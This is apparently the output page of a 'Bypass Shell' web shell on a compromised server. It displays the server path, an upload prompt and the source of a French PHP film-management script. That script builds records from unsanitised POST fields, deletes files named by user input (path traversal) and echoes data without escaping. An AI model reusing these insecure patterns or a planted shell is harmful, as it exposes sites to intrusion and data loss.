JEMBOT MAWOT Bypass Shell

Current Path : /home/cinepatreb/www/patriaManagment/php/film/
Upload File :
Current File : /home/cinepatreb/www/patriaManagment/php/film/data.php

<?php
include_once '../../../php/dao/include_dao.php';
include_once '../outils.php';
$transaction = new Transaction();
$film = new Film();
/* Nouvel enregistrement */
if ($_POST['op'] == 'add' && !isset($_POST['pkFilm'])) {

    $film->nomFilm = $_POST['nomFilm'];
    $film->fkGroupe = $_POST['fkGroupe'];
    $film->description = $_POST['description'];
    $film->affiche = $_POST['affiche'];
    $film->urlSite = $_POST['urlSite'];
    $film->urlVideo = $_POST['urlVideo'];
    $film->urlExterneTarget = $_POST['urlExterneTarget'];
    $film->urlExterne = $_POST['urlExterne'];
    $film->information = $_POST['information'];
    $film->realisateur = $_POST['realisateur'];
    $film->acteur = $_POST['acteur'];
    $film->duree = $_POST['duree'];
//    $film->dateSortie = $_POST['dateSortie'];
    $film->dateSortie = Date::dateFrancaisToLocal($_POST['dateSortie']);
    if (isset($_POST['actif'])) {
        $film->actif = testValeur($_POST['actif'], "on", -1, 0);
    }

    if (isset($_POST['acceuil'])) {
        $film->acceuil = testValeur($_POST['acceuil'], "on", -1, 0);
    }

    $arr = DAOFactory::getFilmDAO()->insert($film);
    $transaction->commit();
}


/* Modification d'un film */
if (($_POST['op'] == 'mod' || $_POST['op'] == 'modAffiche') && isset($_POST['pkFilm']) && $_POST['pkFilm'] != '') {
    $film->pkFilm = $_POST['pkFilm'];
    $film->nomFilm = $_POST['nomFilm'];
    $film->fkGroupe = $_POST['fkGroupe'];
    $film->description = $_POST['description'];
    $film->affiche = $_POST['affiche'];
    $film->urlSite = $_POST['urlSite'];
    $film->urlVideo = $_POST['urlVideo'];
    $film->urlExterneTarget = $_POST['urlExterneTarget'];
    $film->urlExterne = $_POST['urlExterne'];
    $film->information = $_POST['information'];
    $film->realisateur = $_POST['realisateur'];
    $film->acteur = $_POST['acteur'];
    $film->duree = $_POST['duree'];
//    $film->dateSortie = $_POST['dateSortie'];
    $film->dateSortie = Date::dateFrancaisToLocal($_POST['dateSortie']);
    if (isset($_POST['actif'])) {
        $film->actif = testValeur($_POST['actif'], "on", -1, 0);
    }

    if (isset($_POST['acceuil'])) {
        $film->acceuil = testValeur($_POST['acceuil'], "on", -1, 0);
    }


    $arr = DAOFactory::getFilmDAO()->update($film);

    $transaction->commit();
}


if ($_POST['op'] == 'del' && isset($_POST['pkFilm'])) {
    $film->pkFilm = $_POST['pkFilm'];
    $arr = DAOFactory::getFilmDAO()->delete($film->pkFilm);
    $transaction->commit();
}


if ($_POST['op'] == 'delAffiche' && isset($_POST['affiche'])) {
    $film = new Film();
    $path = '../../media/files/' . $_POST['affiche'];
    $pathThumbnail = '../../media/files/thumbnail/' . $_POST['affiche'];
    $film->pkFilm = $_POST['pkFilm'];
    $film->nomFilm = $_POST['nomFilm'];
    $film->fkGroupe = $_POST['fkGroupe'];
    $film->description = $_POST['description'];
    $film->affiche = "";
    $film->urlSite = $_POST['urlSite'];
    $film->urlVideo = $_POST['urlVideo'];
    $film->urlExterneTarget = $_POST['urlExterneTarget'];
    $film->urlExterne = $_POST['urlExterne'];
    $film->information = $_POST['information'];
    $film->realisateur = $_POST['realisateur'];
    $film->acteur = $_POST['acteur'];
    $film->duree = $_POST['duree'];
    $film->dateSortie = $_POST['dateSortie'];
    if (isset($_POST['actif'])) {
        $film->actif = testValeur($_POST['actif'], "on", -1, 0);
    }

    if (isset($_POST['acceuil'])) {
        $film->acceuil = testValeur($_POST['acceuil'], "on", -1, 0);
    }


    $arr = DAOFactory::getFilmDAO()->update($film);


    if (file_exists($path)) {
        unlink($path);
        unlink($pathThumbnail);
    }
    if (!file_exists($path)) {
//        echo '<img src="images/valid.png"/>Fichier supprimé</>';
    }
    $arr = DAOFactory::getFilmDAO()->update($film);
    $transaction->commit();
}
?>



<?php
/* Affichage des données pour les ajouts et les suppressions */
/* Affichage de la ligne modifiée */
if ($_POST['op'] == 'mod') {
    echo $film->nomFilm;
}

if ($_POST['op'] == 'modAffiche') {
    echo $film->affiche;
}


/* Affichage de la liste des genres */
if ($_POST['op'] == 'add' || $_POST['op'] == 'del') {
    $arr = DAOFactory::getFilmDAO()->queryAllOrderBy('nomFilm');

    foreach ($arr as $film) { // parcourt le tableau sequetielement et met la valeur parcourue dans $value
        echo '<a id="menuObj_' . $film->pkFilm . '"href="javascript:void(0)">' . $film->nomFilm . "</a><br>";
    }
    ?>  
    <script>

        <?php
        $arr = DAOFactory::getFilmDAO()->queryAllOrderBy('nomFilm');

        foreach ($arr as $film) { // parcourt le tableau sequetielement et met la valeur parcourue dans $value
            ?> $
                    ("#menuObj_<?php echo $film->pkFilm ?>").click(function () {

                execAjax(
                        'php/film/contenu.php', '#content', {
                            op: 'mod',
                            pkFilm: <?php echo $film->pkFilm;
            ?>
                        }, 0);

            });
            <?php
        }
    }
    ?>

xxxxx1.0, XXX xxxx